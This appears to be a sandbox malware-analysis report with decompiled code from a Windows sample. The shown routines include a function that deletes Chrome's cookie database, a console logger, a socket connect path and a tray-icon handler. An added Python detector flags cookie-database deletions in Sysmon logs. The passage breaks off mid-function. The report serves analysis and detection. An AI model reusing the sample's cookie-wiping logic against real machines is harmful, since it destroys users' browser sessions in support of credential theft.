                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                        • String ID:
                                        • API String ID: 3751107300-0
                                        • Opcode ID: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                        • Opcode Fuzzy Hash: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetWindowTextW.USER32 ref: 0040EAAF
                                        • IsWindowVisible.USER32(?), ref: 0040EAB8
                                        • sprintf.MSVCRT ref: 0040EACF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                        • String ID:
                                        • API String ID: 1480451481-0
                                        • Opcode ID: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                        • Opcode Fuzzy Hash: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                         C-Code - Quality: 32%
                                         			E004071CF() {
                                         				char _v5;
                                         				char _v6;
                                         				char _v24;
                                         				void* _v40;
                                         				char* _t12;
                                         				CHAR* _t13;
                                         				long _t20;
                                         				char* _t21;
                                         				void* _t25;
                                         
                                         				/* Build "%UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Cookies":
                                         				   the getenv() result is wrapped in a std::string and the fixed suffix appended
                                         				   (L00414170 is the std::operator+ import listed under APIs, ref 004071FA) */
                                         				_t12 = getenv("UserProfile");
                                         				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                         				_t13 =  &_v24;
                                         				L00414170();
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                         				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                         				/* Delete the Chrome cookie database; the outcome is reported through the logger E00407A90 */
                                         				if(DeleteFileA(_t13) != 0) {
                                         					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                         					E00407A90("\n[Chrome Cookies found, cleared!]");
                                         					_t25 = 1;
                                         					L8:
                                         					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         					return _t25;
                                         				}
                                         				/* DeleteFileA failed: error codes 0 and 1 are logged as "not found" and return 1,
                                         				   any other error code returns 0 (as decompiled) */
                                         				_t20 = GetLastError();
                                         				if(_t20 == 0) {
                                         					_t21 =  &_v6;
                                         					L5:
                                         					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                         					E00407A90("\n[Chrome Cookies not found]");
                                         					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         					return 1;
                                         				}
                                         				if(_t20 == 1) {
                                         					_t21 =  &_v5;
                                         					goto L5;
                                         				}
                                         				_t25 = 0;
                                         				goto L8;
                                         			}

                                        APIs
                                        • getenv.MSVCRT ref: 004071E4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                        • GetLastError.KERNEL32 ref: 0040721F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                        Strings
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                        • UserProfile, xrefs: 004071DF
                                        • [Chrome Cookies not found], xrefs: 00407239
                                        • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 3740952235-304995407
                                        • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                        • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                        • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                        • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                        Uniqueness

                                        Uniqueness Score: -1.00%
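Detection example for the cookie-wiping routine E004071CF above. This block is added here and is not code from the report or from the sample: it models the observable effect of the routine (a DeleteFileA on %UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Cookies issued by a process that is not the browser) as a check over Sysmon Event ID 23 FileDelete records. The JSON log lines are constructed, the field names (EventID, Image, TargetFilename, User) are assumed to follow Sysmon's naming as exported by a JSON log shipper, and the allow-list of benign images is an assumption. The path pattern goes beyond the sample's hard-coded string: it also matches other profile directories and Chrome's newer <profile>\Network\Cookies location.

```python
"""Flag deletion of Chrome's cookie database by a process other than Chrome.

Added example, not part of the analysis report or the analysed sample.
Assumptions: records are Sysmon Event ID 23 (FileDelete) exported as JSON
lines with the fields EventID, Image, TargetFilename and User; only
chrome.exe is a benign deleter of the file.
"""
import json
import ntpath
import re
from dataclasses import dataclass
from typing import Iterable, List

# The sample hard-codes only "Default\Cookies". Newer Chrome builds keep the
# store at "<profile>\Network\Cookies" and users may run several profiles, so
# the pattern accepts any profile directory and both layouts. The "$" anchor
# keeps "Cookies-journal" and similar siblings from matching.
COOKIE_DB_RE = re.compile(
    r"\\AppData\\Local\\Google\\Chrome\\User Data\\(?P<profile>[^\\]+)"
    r"(?:\\Network)?\\Cookies$",
    re.IGNORECASE,
)

# Image basenames allowed to delete the file (assumption: only the browser).
BENIGN_IMAGES = {"chrome.exe"}


@dataclass(frozen=True)
class Alert:
    image: str
    target: str
    profile: str
    user: str


def parse_events(text: str) -> Iterable[dict]:
    """Yield one dict per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def detect_cookie_wipe(events: Iterable[dict]) -> List[Alert]:
    """Return an Alert for each FileDelete of a Chrome cookie DB by a non-browser image."""
    alerts: List[Alert] = []
    for ev in events:
        if ev.get("EventID") != 23:          # only FileDelete events matter here
            continue
        target = ev.get("TargetFilename", "")
        match = COOKIE_DB_RE.search(target)
        if match is None:
            continue
        image = ev.get("Image", "")
        if ntpath.basename(image).lower() in BENIGN_IMAGES:
            continue
        alerts.append(Alert(image, target, match.group("profile"), ev.get("User", "")))
    return alerts


def scan(text: str) -> List[Alert]:
    """Parse a JSON-lines log and return the alerts it raises."""
    return detect_cookie_wipe(parse_events(text))


# Constructed sample log: one benign deletion by Chrome, two deletions by a
# dropped binary (the second against a non-default profile in the newer
# Network\ layout), one unrelated FileCreate (EventID 11) and one deletion of
# the journal file, which must not match.
SAMPLE_LOG = r"""
{"EventID": 23, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", "User": "DESKTOP\\bob"}
{"EventID": 23, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\dropped.exe", "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", "User": "DESKTOP\\bob"}
{"EventID": 23, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\dropped.exe", "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Network\\Cookies", "User": "DESKTOP\\bob"}
{"EventID": 11, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\dropped.exe", "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Temp\\notes.txt", "User": "DESKTOP\\bob"}
{"EventID": 23, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\dropped.exe", "TargetFilename": "C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal", "User": "DESKTOP\\bob"}
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"ALERT {a.user}: {a.image} deleted {a.target} (profile {a.profile})")
```

Running the block prints two alerts for dropped.exe and none for chrome.exe; the FileCreate record and the Cookies-journal deletion are ignored. In production the allow-list should be keyed on a signed-image check rather than the basename alone, since a dropper can name itself chrome.exe.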

                                         C-Code - Quality: 32%
                                         			E0041203B(char _a4, char _a20) {
                                         				struct _SYSTEMTIME _v20;
                                         				char _v36;
                                         				char _v52;
                                         				char _v68;
                                         				char _v84;
                                         				int _t18;
                                         				char* _t26;
                                         				char* _t27;
                                         				char* _t28;
                                         				char* _t29;
                                         
                                         				/* Console logger: prints "HH:MM:SS:mmm <_a4> <_a20>" only while the global flag at 0x41bcac is non-zero */
                                         				if( *0x41bcac != 0) {
                                         					GetLocalTime( &_v20);
                                         					_t3 =  &(_v20.wSecond); // 0x4051ef
                                         					/* L00414176 / L00414170 / L00414140 are the std::operator+ imports listed under APIs
                                         					   (refs 00412087-004120AE); they chain timestamp + _a4 + " " + _a20 into _v36 */
                                         					_t26 =  &_v84;
                                         					L00414176();
                                         					_t27 =  &_v68;
                                         					L00414170();
                                         					_t28 =  &_v52;
                                         					L00414140();
                                         					_t29 =  &_v36;
                                         					L00414170();
                                         					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                         					_t18 = printf(_t29); /* the assembled message is passed to printf as the format string */
                                         					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				}
                                         				/* the two string arguments are destroyed by the callee */
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				return _t18;
                                         			}

                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00412052
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                        • printf.MSVCRT ref: 004120BF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                        • String ID: %02i:%02i:%02i:%03i $Q@
                                        • API String ID: 4249031962-3186260181
                                        • Opcode ID: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                        • Opcode Fuzzy Hash: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310), ref: 00405902
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310), ref: 00405943
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,Function_0001B310), ref: 00405994
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                        • String ID:
                                        • API String ID: 257471410-0
                                        • Opcode ID: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                        • Opcode Fuzzy Hash: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                         C-Code - Quality: 64%
                                         			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                         				struct tagPOINT _v12;
                                         				void* _t16;
                                         				struct HMENU__* _t17;
                                         				void* _t20;
                                         				void* _t24;
                                         
                                         				/* Window procedure for the window that owns the notification-area icon:
                                         				   _a4 = hWnd, _a8 = uMsg, _a12 = wParam, _a16 = lParam */
                                         				_t16 = _a8 - 1;
                                         				if(_t16 == 0) {
                                         					/* WM_CREATE (0x1): build the popup menu with a single "Close" item (item id 0) */
                                         					_t17 = CreatePopupMenu();
                                         					 *0x41c1f0 = _t17;
                                         					AppendMenuA(_t17, 0, 0, "Close");
                                         					L15:
                                         					return 0;
                                         				}
                                         				_t20 = _t16 - 0x110;
                                         				if(_t20 == 0) {
                                         					/* WM_COMMAND (0x111): item id 0 ("Close") removes the tray icon (NIM_DELETE = 2) and exits */
                                         					if(_a12 != 0) {
                                         						goto L15;
                                         					}
                                         					Shell_NotifyIconA(2, 0x41c200);
                                         					ExitProcess(0);
                                         				}
                                         				if(_t20 == 0x2f0) {
                                         					/* 0x401 (WM_USER + 1): the tray-icon callback message, lParam carries the mouse message */
                                         					_t24 = _a16 - 0x201;
                                         					if(_t24 == 0) {
                                         						/* WM_LBUTTONDOWN (0x201): toggle the main window (SW_RESTORE = 9 / SW_HIDE = 0) */
                                         						if(IsWindowVisible( *0x41c1fc) == 0) {
                                         							ShowWindow( *0x41c1fc, 9);
                                         							SetForegroundWindow( *0x41c1fc);
                                         						} else {
                                         							ShowWindow( *0x41c1fc, 0);
                                         						}
                                         						goto L15;
                                         					}
